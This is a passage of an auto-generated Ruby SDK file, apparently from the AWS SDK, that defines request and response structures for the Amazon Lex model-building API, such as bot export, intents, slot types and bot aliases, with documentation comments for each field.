response includes a pagination # token that you can use in your next request to fetch the next page # of slot types. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetBuiltinSlotTypesResponse AWS API Documentation # class GetBuiltinSlotTypesResponse < Struct.new( :slot_types, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetExportRequest # data as a hash: # # { # name: "Name", # required # version: "NumericalVersion", # required # resource_type: "BOT", # required, accepts BOT, INTENT, SLOT_TYPE # export_type: "ALEXA_SKILLS_KIT", # required, accepts ALEXA_SKILLS_KIT, LEX # } # # @!attribute [rw] name # The name of the bot to export. # @return [String] # # @!attribute [rw] version # The version of the bot to export. # @return [String] # # @!attribute [rw] resource_type # The type of resource to export. # @return [String] # # @!attribute [rw] export_type # The format of the exported data. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetExportRequest AWS API Documentation # class GetExportRequest < Struct.new( :name, :version, :resource_type, :export_type) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the bot being exported. # @return [String] # # @!attribute [rw] version # The version of the bot being exported. # @return [String] # # @!attribute [rw] resource_type # The type of the exported resource. # @return [String] # # @!attribute [rw] export_type # The format of the exported data. # @return [String] # # @!attribute [rw] export_status # The status of the export. # # * `IN_PROGRESS` - The export is in progress. # # * `READY` - The export is complete. # # * `FAILED` - The export could not be completed. # @return [String] # # @!attribute [rw] failure_reason # If `status` is `FAILED`, Amazon Lex provides the reason that it # failed to export the resource. # @return [String] # # @!attribute [rw] url # An S3 pre-signed URL that provides the location of the exported # resource. The exported resource is a ZIP archive that contains the # exported resource in JSON format. The structure of the archive may # change. Your code should not rely on the archive structure. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetExportResponse AWS API Documentation # class GetExportResponse < Struct.new( :name, :version, :resource_type, :export_type, :export_status, :failure_reason, :url) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetImportRequest # data as a hash: # # { # import_id: "String", # required # } # # @!attribute [rw] import_id # The identifier of the import job information to return. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetImportRequest AWS API Documentation # class GetImportRequest < Struct.new( :import_id) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name given to the import job. # @return [String] # # @!attribute [rw] resource_type # The type of resource imported. # @return [String] # # @!attribute [rw] merge_strategy # The action taken when there was a conflict between an existing # resource and a resource in the import file. # @return [String] # # @!attribute [rw] import_id # The identifier for the specific import job. # @return [String] # # @!attribute [rw] import_status # The status of the import job. If the status is `FAILED`, you can get # the reason for the failure from the `failureReason` field. # @return [String] # # @!attribute [rw] failure_reason # A string that describes why an import job failed to complete. # @return [Array<String>] # # @!attribute [rw] created_date # A timestamp for the date and time that the import job was created. # @return [Time] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetImportResponse AWS API Documentation # class GetImportResponse < Struct.new( :name, :resource_type, :merge_strategy, :import_id, :import_status, :failure_reason, :created_date) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetIntentRequest # data as a hash: # # { # name: "IntentName", # required # version: "Version", # required # } # # @!attribute [rw] name # The name of the intent. The name is case sensitive. # @return [String] # # @!attribute [rw] version # The version of the intent. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetIntentRequest AWS API Documentation # class GetIntentRequest < Struct.new( :name, :version) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the intent. # @return [String] # # @!attribute [rw] description # A description of the intent. # @return [String] # # @!attribute [rw] slots # An array of intent slots configured for the intent. # @return [Array<Types::Slot>] # # @!attribute [rw] sample_utterances # An array of sample utterances configured for the intent. # @return [Array<String>] # # @!attribute [rw] confirmation_prompt # If defined in the bot, Amazon Lex uses prompt to confirm the intent # before fulfilling the user's request. For more information, see # PutIntent. # @return [Types::Prompt] # # @!attribute [rw] rejection_statement # If the user answers "no" to the question defined in # `confirmationPrompt`, Amazon Lex responds with this statement to # acknowledge that the intent was canceled. # @return [Types::Statement] # # @!attribute [rw] follow_up_prompt # If defined in the bot, Amazon Lex uses this prompt to solicit # additional user activity after the intent is fulfilled. For more # information, see PutIntent. # @return [Types::FollowUpPrompt] # # @!attribute [rw] conclusion_statement # After the Lambda function specified in the `fulfillmentActivity` # element fulfills the intent, Amazon Lex conveys this statement to # the user. # @return [Types::Statement] # # @!attribute [rw] dialog_code_hook # If defined in the bot, Amazon Amazon Lex invokes this Lambda # function for each user input. For more information, see PutIntent. # @return [Types::CodeHook] # # @!attribute [rw] fulfillment_activity # Describes how the intent is fulfilled. For more information, see # PutIntent. # @return [Types::FulfillmentActivity] # # @!attribute [rw] parent_intent_signature # A unique identifier for a built-in intent. # @return [String] # # @!attribute [rw] last_updated_date # The date that the intent was updated. When you create a resource, # the creation date and the last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the intent was created. # @return [Time] # # @!attribute [rw] version # The version of the intent. # @return [String] # # @!attribute [rw] checksum # Checksum of the intent. # @return [String] # # @!attribute [rw] kendra_configuration # Configuration information, if any, to connect to an Amazon Kendra # index with the `AMAZON.KendraSearchIntent` intent. # @return [Types::KendraConfiguration] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetIntentResponse AWS API Documentation # class GetIntentResponse < Struct.new( :name, :description, :slots, :sample_utterances, :confirmation_prompt, :rejection_statement, :follow_up_prompt, :conclusion_statement, :dialog_code_hook, :fulfillment_activity, :parent_intent_signature, :last_updated_date, :created_date, :version, :checksum, :kendra_configuration) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetIntentVersionsRequest # data as a hash: # # { # name: "IntentName", # required # next_token: "NextToken", # max_results: 1, # } # # @!attribute [rw] name # The name of the intent for which versions should be returned. # @return [String] # # @!attribute [rw] next_token # A pagination token for fetching the next page of intent versions. If # the response to this call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of # versions, specify the pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of intent versions to return in the response. The # default is 10. # @return [Integer] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetIntentVersionsRequest AWS API Documentation # class GetIntentVersionsRequest < Struct.new( :name, :next_token, :max_results) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] intents # An array of `IntentMetadata` objects, one for each numbered version # of the intent plus one for the `$LATEST` version. # @return [Array<Types::IntentMetadata>] # # @!attribute [rw] next_token # A pagination token for fetching the next page of intent versions. If # the response to this call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of # versions, specify the pagination token in the next request. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetIntentVersionsResponse AWS API Documentation # class GetIntentVersionsResponse < Struct.new( :intents, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetIntentsRequest # data as a hash: # # { # next_token: "NextToken", # max_results: 1, # name_contains: "IntentName", # } # # @!attribute [rw] next_token # A pagination token that fetches the next page of intents. If the # response to this API call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of intents, # specify the pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of intents to return in the response. The default # is 10. # @return [Integer] # # @!attribute [rw] name_contains # Substring to match in intent names. An intent will be returned if # any part of its name matches the substring. For example, "xyz" # matches both "xyzabc" and "abcxyz." # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetIntentsRequest AWS API Documentation # class GetIntentsRequest < Struct.new( :next_token, :max_results, :name_contains) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] intents # An array of `Intent` objects. For more information, see PutBot. # @return [Array<Types::IntentMetadata>] # # @!attribute [rw] next_token # If the response is truncated, the response includes a pagination # token that you can specify in your next request to fetch the next # page of intents. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetIntentsResponse AWS API Documentation # class GetIntentsResponse < Struct.new( :intents, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetSlotTypeRequest # data as a hash: # # { # name: "SlotTypeName", # required # version: "Version", # required # } # # @!attribute [rw] name # The name of the slot type. The name is case sensitive. # @return [String] # # @!attribute [rw] version # The version of the slot type. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetSlotTypeRequest AWS API Documentation # class GetSlotTypeRequest < Struct.new( :name, :version) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the slot type. # @return [String] # # @!attribute [rw] description # A description of the slot type. # @return [String] # # @!attribute [rw] enumeration_values # A list of `EnumerationValue` objects that defines the values that # the slot type can take. # @return [Array<Types::EnumerationValue>] # # @!attribute [rw] last_updated_date # The date that the slot type was updated. When you create a resource, # the creation date and last update date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the slot type was created. # @return [Time] # # @!attribute [rw] version # The version of the slot type. # @return [String] # # @!attribute [rw] checksum # Checksum of the `$LATEST` version of the slot type. # @return [String] # # @!attribute [rw] value_selection_strategy # The strategy that Amazon Lex uses to determine the value of the # slot. For more information, see PutSlotType. # @return [String] # # @!attribute [rw] parent_slot_type_signature # The built-in slot type used as a parent for the slot type. # @return [String] # # @!attribute [rw] slot_type_configurations # Configuration information that extends the parent built-in slot # type. # @return [Array<Types::SlotTypeConfiguration>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetSlotTypeResponse AWS API Documentation # class GetSlotTypeResponse < Struct.new( :name, :description, :enumeration_values, :last_updated_date, :created_date, :version, :checksum, :value_selection_strategy, :parent_slot_type_signature, :slot_type_configurations) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetSlotTypeVersionsRequest # data as a hash: # # { # name: "SlotTypeName", # required # next_token: "NextToken", # max_results: 1, # } # # @!attribute [rw] name # The name of the slot type for which versions should be returned. # @return [String] # # @!attribute [rw] next_token # A pagination token for fetching the next page of slot type versions. # If the response to this call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of # versions, specify the pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of slot type versions to return in the response. # The default is 10. # @return [Integer] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetSlotTypeVersionsRequest AWS API Documentation # class GetSlotTypeVersionsRequest < Struct.new( :name, :next_token, :max_results) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] slot_types # An array of `SlotTypeMetadata` objects, one for each numbered # version of the slot type plus one for the `$LATEST` version. # @return [Array<Types::SlotTypeMetadata>] # # @!attribute [rw] next_token # A pagination token for fetching the next page of slot type versions. # If the response to this call is truncated, Amazon Lex returns a # pagination token in the response. To fetch the next page of # versions, specify the pagination token in the next request. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetSlotTypeVersionsResponse AWS API Documentation # class GetSlotTypeVersionsResponse < Struct.new( :slot_types, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetSlotTypesRequest # data as a hash: # # { # next_token: "NextToken", # max_results: 1, # name_contains: "SlotTypeName", # } # # @!attribute [rw] next_token # A pagination token that fetches the next page of slot types. If the # response to this API call is truncated, Amazon Lex returns a # pagination token in the response. To fetch next page of slot types, # specify the pagination token in the next request. # @return [String] # # @!attribute [rw] max_results # The maximum number of slot types to return in the response. The # default is 10. # @return [Integer] # # @!attribute [rw] name_contains # Substring to match in slot type names. A slot type will be returned # if any part of its name matches the substring. For example, "xyz" # matches both "xyzabc" and "abcxyz." # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetSlotTypesRequest AWS API Documentation # class GetSlotTypesRequest < Struct.new( :next_token, :max_results, :name_contains) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] slot_types # An array of objects, one for each slot type, that provides # information such as the name of the slot type, the version, and a # description. # @return [Array<Types::SlotTypeMetadata>] # # @!attribute [rw] next_token # If the response is truncated, it includes a pagination token that # you can specify in your next request to fetch the next page of slot # types. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetSlotTypesResponse AWS API Documentation # class GetSlotTypesResponse < Struct.new( :slot_types, :next_token) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass GetUtterancesViewRequest # data as a hash: # # { # bot_name: "BotName", # required # bot_versions: ["Version"], # required # status_type: "Detected", # required, accepts Detected, Missed # } # # @!attribute [rw] bot_name # The name of the bot for which utterance information should be # returned. # @return [String] # # @!attribute [rw] bot_versions # An array of bot versions for which utterance information should be # returned. The limit is 5 versions per request. # @return [Array<String>] # # @!attribute [rw] status_type # To return utterances that were recognized and handled, use # `Detected`. To return utterances that were not recognized, use # `Missed`. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetUtterancesViewRequest AWS API Documentation # class GetUtterancesViewRequest < Struct.new( :bot_name, :bot_versions, :status_type) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] bot_name # The name of the bot for which utterance information was returned. # @return [String] # # @!attribute [rw] utterances # An array of UtteranceList objects, each containing a list of # UtteranceData objects describing the utterances that were processed # by your bot. The response contains a maximum of 100 `UtteranceData` # objects for each version. Amazon Lex returns the most frequent # utterances received by the bot in the last 15 days. # @return [Array<Types::UtteranceList>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/GetUtterancesViewResponse AWS API Documentation # class GetUtterancesViewResponse < Struct.new( :bot_name, :utterances) SENSITIVE = [] include Aws::Structure end # Identifies the specific version of an intent. # # @note When making an API call, you may pass Intent # data as a hash: # # { # intent_name: "IntentName", # required # intent_version: "Version", # required # } # # @!attribute [rw] intent_name # The name of the intent. # @return [String] # # @!attribute [rw] intent_version # The version of the intent. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/Intent AWS API Documentation # class Intent < Struct.new( :intent_name, :intent_version) SENSITIVE = [] include Aws::Structure end # Provides information about an intent. # # @!attribute [rw] name # The name of the intent. # @return [String] # # @!attribute [rw] description # A description of the intent. # @return [String] # # @!attribute [rw] last_updated_date # The date that the intent was updated. When you create an intent, the # creation date and last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the intent was created. # @return [Time] # # @!attribute [rw] version # The version of the intent. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/IntentMetadata AWS API Documentation # class IntentMetadata < Struct.new( :name, :description, :last_updated_date, :created_date, :version) SENSITIVE = [] include Aws::Structure end # An internal Amazon Lex error occurred. Try your request again. # # @!attribute [rw] message # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/InternalFailureException AWS API Documentation # class InternalFailureException < Struct.new( :message) SENSITIVE = [] include Aws::Structure end # Provides configuration information for the AMAZON.KendraSearchIntent # intent. When you use this intent, Amazon Lex searches the specified # Amazon Kendra index and returns documents from the index that match # the user's utterance. For more information, see [ # AMAZON.KendraSearchIntent][1]. # # # # [1]: http://docs.aws.amazon.com/lex/latest/dg/built-in-intent-kendra-search.html # # @note When making an API call, you may pass KendraConfiguration # data as a hash: # # { # kendra_index: "KendraIndexArn", # required # query_filter_string: "QueryFilterString", # role: "roleArn", # required # } # # @!attribute [rw] kendra_index # The Amazon Resource Name (ARN) of the Amazon Kendra index that you # want the AMAZON.KendraSearchIntent intent to search. The index must # be in the same account and Region as the Amazon Lex bot. If the # Amazon Kendra index does not exist, you get an exception when you # call the `PutIntent` operation. # @return [String] # # @!attribute [rw] query_filter_string # A query filter that Amazon Lex sends to Amazon Kendra to filter the # response from the query. The filter is in the format defined by # Amazon Kendra. For more information, see [Filtering queries][1]. # # You can override this filter string with a new filter string at # runtime. # # # # [1]: http://docs.aws.amazon.com/kendra/latest/dg/filtering.html # @return [String] # # @!attribute [rw] role # The Amazon Resource Name (ARN) of an IAM role that has permission to # search the Amazon Kendra index. The role must be in the same account # and Region as the Amazon Lex bot. If the role does not exist, you # get an exception when you call the `PutIntent` operation. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/KendraConfiguration AWS API Documentation # class KendraConfiguration < Struct.new( :kendra_index, :query_filter_string, :role) SENSITIVE = [] include Aws::Structure end # The request exceeded a limit. Try your request again. # # @!attribute [rw] retry_after_seconds # @return [String] # # @!attribute [rw] message # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/LimitExceededException AWS API Documentation # class LimitExceededException < Struct.new( :retry_after_seconds, :message) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass ListTagsForResourceRequest # data as a hash: # # { # resource_arn: "AmazonResourceName", # required # } # # @!attribute [rw] resource_arn # The Amazon Resource Name (ARN) of the resource to get a list of tags # for. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/ListTagsForResourceRequest AWS API Documentation # class ListTagsForResourceRequest < Struct.new( :resource_arn) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] tags # The tags associated with a resource. # @return [Array<Types::Tag>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/ListTagsForResourceResponse AWS API Documentation # class ListTagsForResourceResponse < Struct.new( :tags) SENSITIVE = [] include Aws::Structure end # Settings used to configure delivery mode and destination for # conversation logs. # # @note When making an API call, you may pass LogSettingsRequest # data as a hash: # # { # log_type: "AUDIO", # required, accepts AUDIO, TEXT # destination: "CLOUDWATCH_LOGS", # required, accepts CLOUDWATCH_LOGS, S3 # kms_key_arn: "KmsKeyArn", # resource_arn: "ResourceArn", # required # } # # @!attribute [rw] log_type # The type of logging to enable. Text logs are delivered to a # CloudWatch Logs log group. Audio logs are delivered to an S3 bucket. # @return [String] # # @!attribute [rw] destination # Where the logs will be delivered. Text logs are delivered to a # CloudWatch Logs log group. Audio logs are delivered to an S3 bucket. # @return [String] # # @!attribute [rw] kms_key_arn # The Amazon Resource Name (ARN) of the AWS KMS customer managed key # for encrypting audio logs delivered to an S3 bucket. The key does # not apply to CloudWatch Logs and is optional for S3 buckets. # @return [String] # # @!attribute [rw] resource_arn # The Amazon Resource Name (ARN) of the CloudWatch Logs log group or # S3 bucket where the logs should be delivered. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/LogSettingsRequest AWS API Documentation # class LogSettingsRequest < Struct.new( :log_type, :destination, :kms_key_arn, :resource_arn) SENSITIVE = [] include Aws::Structure end # The settings for conversation logs. # # @!attribute [rw] log_type # The type of logging that is enabled. # @return [String] # # @!attribute [rw] destination # The destination where logs are delivered. # @return [String] # # @!attribute [rw] kms_key_arn # The Amazon Resource Name (ARN) of the key used to encrypt audio logs # in an S3 bucket. # @return [String] # # @!attribute [rw] resource_arn # The Amazon Resource Name (ARN) of the CloudWatch Logs log group or # S3 bucket where the logs are delivered. # @return [String] # # @!attribute [rw] resource_prefix # The resource prefix is the first part of the S3 object key within # the S3 bucket that you specified to contain audio logs. For # CloudWatch Logs it is the prefix of the log stream name within the # log group that you specified. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/LogSettingsResponse AWS API Documentation # class LogSettingsResponse < Struct.new( :log_type, :destination, :kms_key_arn, :resource_arn, :resource_prefix) SENSITIVE = [] include Aws::Structure end # The message object that provides the message text and its type. # # @note When making an API call, you may pass Message # data as a hash: # # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # } # # @!attribute [rw] content_type # The content type of the message string. # @return [String] # # @!attribute [rw] content # The text of the message. # @return [String] # # @!attribute [rw] group_number # Identifies the message group that the message belongs to. When a # group is assigned to a message, Amazon Lex returns one message from # each group in the response. # @return [Integer] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/Message AWS API Documentation # class Message < Struct.new( :content_type, :content, :group_number) SENSITIVE = [] include Aws::Structure end # The resource specified in the request was not found. Check the # resource and try again. # # @!attribute [rw] message # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/NotFoundException AWS API Documentation # class NotFoundException < Struct.new( :message) SENSITIVE = [] include Aws::Structure end # The checksum of the resource that you are trying to change does not # match the checksum in the request. Check the resource's checksum and # try again. # # @!attribute [rw] message # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PreconditionFailedException AWS API Documentation # class PreconditionFailedException < Struct.new( :message) SENSITIVE = [] include Aws::Structure end # Obtains information from the user. To define a prompt, provide one or # more messages and specify the number of attempts to get information # from the user. If you provide more than one message, Amazon Lex # chooses one of the messages to use to prompt the user. For more # information, see how-it-works. # # @note When making an API call, you may pass Prompt # data as a hash: # # { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # max_attempts: 1, # required # response_card: "ResponseCard", # } # # @!attribute [rw] messages # An array of objects, each of which provides a message string and its # type. You can specify the message string in plain text or in Speech # Synthesis Markup Language (SSML). # @return [Array<Types::Message>] # # @!attribute [rw] max_attempts # The number of times to prompt the user for information. # @return [Integer] # # @!attribute [rw] response_card # A response card. Amazon Lex uses this prompt at runtime, in the # `PostText` API response. It substitutes session attributes and slot # values for placeholders in the response card. For more information, # see ex-resp-card. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/Prompt AWS API Documentation # class Prompt < Struct.new( :messages, :max_attempts, :response_card) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass PutBotAliasRequest # data as a hash: # # { # name: "AliasName", # required # description: "Description", # bot_version: "Version", # required # bot_name: "BotName", # required # checksum: "String", # conversation_logs: { # log_settings: [ # required # { # log_type: "AUDIO", # required, accepts AUDIO, TEXT # destination: "CLOUDWATCH_LOGS", # required, accepts CLOUDWATCH_LOGS, S3 # kms_key_arn: "KmsKeyArn", # resource_arn: "ResourceArn", # required # }, # ], # iam_role_arn: "IamRoleArn", # required # }, # tags: [ # { # key: "TagKey", # required # value: "TagValue", # required # }, # ], # } # # @!attribute [rw] name # The name of the alias. The name is *not* case sensitive. # @return [String] # # @!attribute [rw] description # A description of the alias. # @return [String] # # @!attribute [rw] bot_version # The version of the bot. # @return [String] # # @!attribute [rw] bot_name # The name of the bot. # @return [String] # # @!attribute [rw] checksum # Identifies a specific revision of the `$LATEST` version. # # When you create a new bot alias, leave the `checksum` field blank. # If you specify a checksum you get a `BadRequestException` exception. # # When you want to update a bot alias, set the `checksum` field to the # checksum of the most recent revision of the `$LATEST` version. If # you don't specify the ` checksum` field, or if the checksum does # not match the `$LATEST` version, you get a # `PreconditionFailedException` exception. # @return [String] # # @!attribute [rw] conversation_logs # Settings for conversation logs for the alias. # @return [Types::ConversationLogsRequest] # # @!attribute [rw] tags # A list of tags to add to the bot alias. You can only add tags when # you create an alias, you can't use the `PutBotAlias` operation to # update the tags on a bot alias. To update tags, use the # `TagResource` operation. # @return [Array<Types::Tag>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PutBotAliasRequest AWS API Documentation # class PutBotAliasRequest < Struct.new( :name, :description, :bot_version, :bot_name, :checksum, :conversation_logs, :tags) SENSITIVE = [] include Aws::Structure end # @!attribute [rw] name # The name of the alias. # @return [String] # # @!attribute [rw] description # A description of the alias. # @return [String] # # @!attribute [rw] bot_version # The version of the bot that the alias points to. # @return [String] # # @!attribute [rw] bot_name # The name of the bot that the alias points to. # @return [String] # # @!attribute [rw] last_updated_date # The date that the bot alias was updated. When you create a resource, # the creation date and the last updated date are the same. # @return [Time] # # @!attribute [rw] created_date # The date that the bot alias was created. # @return [Time] # # @!attribute [rw] checksum # The checksum for the current version of the alias. # @return [String] # # @!attribute [rw] conversation_logs # The settings that determine how Amazon Lex uses conversation logs # for the alias. # @return [Types::ConversationLogsResponse] # # @!attribute [rw] tags # A list of tags associated with a bot. # @return [Array<Types::Tag>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/PutBotAliasResponse AWS API Documentation # class PutBotAliasResponse < Struct.new( :name, :description, :bot_version, :bot_name, :last_updated_date, :created_date, :checksum, :conversation_logs, :tags) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass PutBotRequest # data as a hash: # # { # name: "BotName", # required # description: "Description", # intents: [ # { # intent_name: "IntentName", # required # intent_version: "Version", # required # }, # ], # enable_model_improvements: false, # nlu_intent_confidence_threshold: 1.0, # clarification_prompt: { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # max_attempts: 1, # required # response_card: "ResponseCard", # }, # abort_statement: { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # response_card: "ResponseCard", # }, # idle_session_ttl_in_seconds: 1, # voice_id: "String", # checksum: "String", # process_behavior: "SAVE", # accepts SAVE, BUILD # locale: "de-DE", # required, accepts de-DE, en-AU, en-GB, en-US, es-US # child_directed: false, # required # detect_sentiment: false, # create_version: false, # tags: [ # { # key: "TagKey", # required # value: "TagValue", # required # }, # ], # } # # @!attribute [rw] name # The name of the bot. The name is *not* case sensitive. # @return [String] # # @!attribute [rw] description # A description of the bot. # @return [String] # # @!attribute [rw] intents # An array of `Intent` objects. Each intent represents a command that # a user can express. For example, a pizza ordering bot might support # an OrderPizza intent. For more information, see how-it-works. # @return [Array<Types::Intent>] # # @!attribute [rw] enable_model_improvements # Set to `true` to enable access to natural language understanding # improvements. # # When you set the `enableModelImprovements` parameter to `true` you # can use the `nluIntentConfidenceThreshold` parameter to configure # confidence scores. For more information, see [Confidence Scores][1]. # # You can only set the `enableModelImprovements` parameter in certain # Regions. If you set the parameter to `true`, your bot has access to # accuracy improvements. # # The Regions where you can set the `enableModelImprovements` # parameter to `true` are: # # * US East (N. Virginia) (us-east-1) # # * US West (Oregon) (us-west-2) # # * Asia Pacific (Sydney) (ap-southeast-2) # # * EU (Ireland) (eu-west-1) # # In other Regions, the `enableModelImprovements` parameter is set to # `true` by default. In these Regions setting the parameter to `false` # throws a `ValidationException` exception. # # * Asia Pacific (Singapore) (ap-southeast-1) # # * Asia Pacific (Tokyo) (ap-northeast-1) # # * EU (Frankfurt) (eu-central-1) # # * EU (London) (eu-west-2) # # # # [1]: https://docs.aws.amazon.com/lex/latest/dg/confidence-scores.html # @return [Boolean] # # @!attribute [rw] nlu_intent_confidence_threshold # Determines the threshold where Amazon Lex will insert the # `AMAZON.FallbackIntent`, `AMAZON.KendraSearchIntent`, or both when # returning alternative intents in a [PostContent][1] or [PostText][2] # response. `AMAZON.FallbackIntent` and `AMAZON.KendraSearchIntent` # are only inserted if they are configured for the bot. # # You must set the `enableModelImprovements` parameter to `true` to # use confidence scores. # # * US East (N. Virginia) (us-east-1) # # * US West (Oregon) (us-west-2) # # * Asia Pacific (Sydney) (ap-southeast-2) # # * EU (Ireland) (eu-west-1) # # In other Regions, the `enableModelImprovements` parameter is set to # `true` by default. # # For example, suppose a bot is configured with the confidence # threshold of 0.80 and the `AMAZON.FallbackIntent`. Amazon Lex # returns three alternative intents with the following confidence # scores: IntentA (0.70), IntentB (0.60), IntentC (0.50). The response # from the `PostText` operation would be: # # * AMAZON.FallbackIntent # # * IntentA # # * IntentB # # * IntentC # # # # [1]: https://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostContent.html # [2]: https://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostText.html # @return [Float] # # @!attribute [rw] clarification_prompt # When Amazon Lex doesn't understand the user's intent, it uses this # message to get clarification. To specify how many times Amazon Lex # should repeat the clarification prompt, use the `maxAttempts` field. # If Amazon Lex still doesn't understand, it sends the message in the # `abortStatement` field. # # When you create a clarification prompt, make sure that it suggests # the correct response from the user. for example, for a bot that # orders pizza and drinks, you might create this clarification prompt: # "What would you like to do? You can say 'Order a pizza' or # 'Order a drink.'" # # If you have defined a fallback intent, it will be invoked if the # clarification prompt is repeated the number of times defined in the # `maxAttempts` field. For more information, see [ # AMAZON.FallbackIntent][1]. # # If you don't define a clarification prompt, at runtime Amazon Lex # will return a 400 Bad Request exception in three cases: # # * Follow-up prompt - When the user responds to a follow-up prompt # but does not provide an intent. For example, in response to a # follow-up prompt that says "Would you like anything else today?" # the user says "Yes." Amazon Lex will return a 400 Bad Request # exception because it does not have a clarification prompt to send # to the user to get an intent. # # * Lambda function - When using a Lambda function, you return an # `ElicitIntent` dialog type. Since Amazon Lex does not have a # clarification prompt to get an intent from the user, it returns a # 400 Bad Request exception. # # * PutSession operation - When using the `PutSession` operation, you # send an `ElicitIntent` dialog type. Since Amazon Lex does not have # a clarification prompt to get an intent from the user, it returns # a 400 Bad Request exception. # # # # [1]: https://docs.aws.amazon.com/lex/latest/dg/built-in-intent-fallback.html # @return [Types::Prompt] # # @!attribute [rw] abort_statement # When Amazon Lex can't understand the user's input in context, it # tries to elicit the information a few times. After that, Amazon Lex # sends the message defined in `abortStatement` to the user, and then # cancels the conversation. To set the number of retries, use the # `valueElicitationPrompt` field for the slot type. # # For example, in a pizza ordering bot, Amazon Lex might ask a user # "What type of crust would you like?" If the user's response is # not one of the expected responses (for example, "thin crust, "deep # dish," etc.), Amazon Lex tries to elicit a correct response a few # more times. # # For example, in a pizza ordering application, `OrderPizza` might be # one of the intents. This intent might require the `CrustType` slot. # You specify the `valueElicitationPrompt` field when you create the # `CrustType` slot. # # If you have defined a fallback intent the cancel statement will not # be sent to the user, the fallback intent is used instead. For more # information, see [ AMAZON.FallbackIntent][1]. # # # # [1]: 